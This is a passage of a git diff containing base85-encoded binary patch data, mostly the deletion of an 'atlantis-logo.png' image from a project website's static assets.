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

diff --git a/website/src/static/img/atlantis-logo.png b/website/src/static/img/atlantis-logo.png
deleted file mode 100644
index 4fab9dd9627234e028fc354369562e2081f28960..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 21445
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
